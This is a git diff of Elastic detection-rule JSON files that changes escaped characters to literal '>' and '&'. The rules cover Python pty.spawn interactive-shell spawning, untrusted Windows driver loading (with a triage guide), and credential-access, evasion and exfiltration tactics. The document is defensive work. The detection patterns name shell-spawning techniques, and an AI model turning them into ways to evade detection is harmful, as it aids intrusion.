@@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Interactive Terminal Spawned via Python", - "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and\n(\n (process.parent.name : \"python*\" and process.name : \"*sh\" and process.parent.args_count \u003e= 3 and\n process.parent.args : \"*pty.spawn*\" and process.parent.args : \"-c\") or\n (process.parent.name : \"python*\" and process.name : \"*sh\" and process.args : \"*sh\" and process.args_count == 1\n and process.parent.args_count == 1)\n)\n", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and\n(\n (process.parent.name : \"python*\" and process.name : \"*sh\" and process.parent.args_count >= 3 and\n process.parent.args : \"*pty.spawn*\" and process.parent.args : \"-c\") or\n (process.parent.name : \"python*\" and process.name : \"*sh\" and process.args : \"*sh\" and process.args_count == 1\n and process.parent.args_count == 1)\n)\n", "related_integrations": [ { "package": "endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_107.json b/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_107.json index dc0d6ee01e0..21bb3c9a2f4 100644 --- a/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_107.json +++ b/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_107.json 
@@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Interactive Terminal Spawned via Python", - "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and\n(\n (process.parent.name : \"python*\" and process.name : \"*sh\" and process.parent.args_count \u003e= 3 and\n process.parent.args : \"*pty.spawn*\" and process.parent.args : \"-c\") or\n (process.parent.name : \"python*\" and process.name : \"*sh\" and process.args : \"*sh\" and process.args_count == 1\n and process.parent.args_count == 1)\n)\n", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and\n(\n (process.parent.name : \"python*\" and process.name : \"*sh\" and process.parent.args_count >= 3 and\n process.parent.args : \"*pty.spawn*\" and process.parent.args : \"-c\") or\n (process.parent.name : \"python*\" and process.name : \"*sh\" and process.args : \"*sh\" and process.args_count == 1\n and process.parent.args_count == 1)\n)\n", "related_integrations": [ { "package": "endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_108.json b/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_108.json index 954701472d3..e100017f3c5 100644 --- a/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_108.json +++ b/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_108.json 
@@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Interactive Terminal Spawned via Python", - "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and\n(\n (process.parent.name : \"python*\" and process.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\",\n \"fish\") and process.parent.args_count \u003e= 3 and process.parent.args : \"*pty.spawn*\" and process.parent.args : \"-c\") or\n (process.parent.name : \"python*\" and process.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\",\n \"fish\") and process.args : \"*sh\" and process.args_count == 1 and process.parent.args_count == 1)\n)\n", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and\n(\n (process.parent.name : \"python*\" and process.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\",\n \"fish\") and process.parent.args_count >= 3 and process.parent.args : \"*pty.spawn*\" and process.parent.args : \"-c\") or\n (process.parent.name : \"python*\" and process.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\",\n \"fish\") and process.args : \"*sh\" and process.args_count == 1 and process.parent.args_count == 1)\n)\n", "related_integrations": [ { "package": "endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_109.json b/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_109.json index cf5a173ece2..e1adbc890a0 100644 --- a/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_109.json 
+++ b/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_109.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Interactive Terminal Spawned via Python", - "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and\n(\n (process.parent.name : \"python*\" and process.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\",\n \"fish\") and process.parent.args_count \u003e= 3 and process.parent.args : \"*pty.spawn*\" and process.parent.args : \"-c\") or\n (process.parent.name : \"python*\" and process.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\",\n \"fish\") and process.args : \"*sh\" and process.args_count == 1 and process.parent.args_count == 1)\n)\n", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and\n(\n (process.parent.name : \"python*\" and process.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\",\n \"fish\") and process.parent.args_count >= 3 and process.parent.args : \"*pty.spawn*\" and process.parent.args : \"-c\") or\n (process.parent.name : \"python*\" and process.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\",\n \"fish\") and process.args : \"*sh\" and process.args_count == 1 and process.parent.args_count == 1)\n)\n", "related_integrations": [ { "package": "endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d79c4b2a-6134-4edd-86e6-564a92a933f9_101.json b/packages/security_detection_engine/kibana/security_rule/d79c4b2a-6134-4edd-86e6-564a92a933f9_101.json index 54f1251c35e..9078fbea04d 100644 
--- a/packages/security_detection_engine/kibana/security_rule/d79c4b2a-6134-4edd-86e6-564a92a933f9_101.json +++ b/packages/security_detection_engine/kibana/security_rule/d79c4b2a-6134-4edd-86e6-564a92a933f9_101.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d79c4b2a-6134-4edd-86e6-564a92a933f9_102.json b/packages/security_detection_engine/kibana/security_rule/d79c4b2a-6134-4edd-86e6-564a92a933f9_102.json index 00804cbeac8..4d3e4cb60d8 100644 --- a/packages/security_detection_engine/kibana/security_rule/d79c4b2a-6134-4edd-86e6-564a92a933f9_102.json +++ b/packages/security_detection_engine/kibana/security_rule/d79c4b2a-6134-4edd-86e6-564a92a933f9_102.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d79c4b2a-6134-4edd-86e6-564a92a933f9_103.json b/packages/security_detection_engine/kibana/security_rule/d79c4b2a-6134-4edd-86e6-564a92a933f9_103.json index b34c3ed18a3..db3fb0db772 100644 --- a/packages/security_detection_engine/kibana/security_rule/d79c4b2a-6134-4edd-86e6-564a92a933f9_103.json +++ b/packages/security_detection_engine/kibana/security_rule/d79c4b2a-6134-4edd-86e6-564a92a933f9_103.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d7d5c059-c19a-4a96-8ae3-41496ef3bcf9_101.json b/packages/security_detection_engine/kibana/security_rule/d7d5c059-c19a-4a96-8ae3-41496ef3bcf9_101.json index d9e7ea942bc..cc1602a7cae 100644 --- a/packages/security_detection_engine/kibana/security_rule/d7d5c059-c19a-4a96-8ae3-41496ef3bcf9_101.json 
+++ b/packages/security_detection_engine/kibana/security_rule/d7d5c059-c19a-4a96-8ae3-41496ef3bcf9_101.json @@ -29,7 +29,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d7d5c059-c19a-4a96-8ae3-41496ef3bcf9_102.json b/packages/security_detection_engine/kibana/security_rule/d7d5c059-c19a-4a96-8ae3-41496ef3bcf9_102.json index 14f1471aa04..c7505c11ef4 100644 --- a/packages/security_detection_engine/kibana/security_rule/d7d5c059-c19a-4a96-8ae3-41496ef3bcf9_102.json +++ b/packages/security_detection_engine/kibana/security_rule/d7d5c059-c19a-4a96-8ae3-41496ef3bcf9_102.json @@ -28,7 +28,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d7d5c059-c19a-4a96-8ae3-41496ef3bcf9_103.json b/packages/security_detection_engine/kibana/security_rule/d7d5c059-c19a-4a96-8ae3-41496ef3bcf9_103.json index 1588199870f..b4afc82a8a7 100644 --- a/packages/security_detection_engine/kibana/security_rule/d7d5c059-c19a-4a96-8ae3-41496ef3bcf9_103.json +++ b/packages/security_detection_engine/kibana/security_rule/d7d5c059-c19a-4a96-8ae3-41496ef3bcf9_103.json @@ -42,7 +42,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_100.json b/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_100.json index 35effd4c4e3..b307a6bf5b4 100644 --- a/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_100.json 
+++ b/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_100.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -66,7 +66,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_101.json b/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_101.json index 6046e4bfe8b..e30ed7d5f43 100644 --- a/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_101.json +++ b/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_101.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -63,7 +63,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_102.json b/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_102.json index a92342d9898..ca7829d5943 100644 --- a/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_102.json +++ b/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_102.json @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", 
@@ -62,7 +62,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_103.json b/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_103.json index ed11470d06e..4539fee4293 100644 --- a/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_103.json +++ b/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_103.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -69,7 +69,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_2.json b/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_2.json index 14109422537..a2f0a24bb1c 100644 --- a/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_2.json +++ b/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_2.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_3.json b/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_3.json index ac443d41b48..0da410e69dd 100644 --- a/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_3.json 
+++ b/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_3.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Untrusted Driver Loaded", - "note": "## Triage and analysis\n\n### Investigating Untrusted Driver Loaded\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies an attempt to load an untrusted driver, which effectively means that DSE was disabled or bypassed. This can indicate that the system was compromised.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from. If you're using Elastic Defend, path information can be found in the `dll.path` field.\n - Examine the file creation and modification timestamps:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `dll.Ext.relative_file_name_modify_time` fields. 
The values are in seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. 
The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Untrusted Driver Loaded\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies an attempt to load an untrusted driver, which effectively means that DSE was disabled or bypassed. This can indicate that the system was compromised.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from. 
If you're using Elastic Defend, path information can be found in the `dll.path` field.\n - Examine the file creation and modification timestamps:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `dll.Ext.relative_file_name_modify_time` fields. The values are in seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts 
from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "driver where host.os.type == \"windows\" and process.pid == 4 and\n dll.code_signature.trusted != true and \n not dll.code_signature.status : (\"errorExpired\", \"errorRevoked\")\n",
 "references": [
 "https://github.com/hfiref0x/TDL",
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_4.json b/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_4.json
index 9ad03d5734d..c34fd8d978c 100644
--- a/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_4.json
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Untrusted Driver Loaded", - "note": "## Triage and analysis\n\n### Investigating Untrusted Driver Loaded\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies an attempt to load an untrusted driver, which effectively means that DSE was disabled or bypassed. This can indicate that the system was compromised.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from. If you're using Elastic Defend, path information can be found in the `dll.path` field.\n - Examine the file creation and modification timestamps:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `dll.Ext.relative_file_name_modify_time` fields. 
The values are in seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. 
The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Untrusted Driver Loaded\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies an attempt to load an untrusted driver, which effectively means that DSE was disabled or bypassed. This can indicate that the system was compromised.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from. 
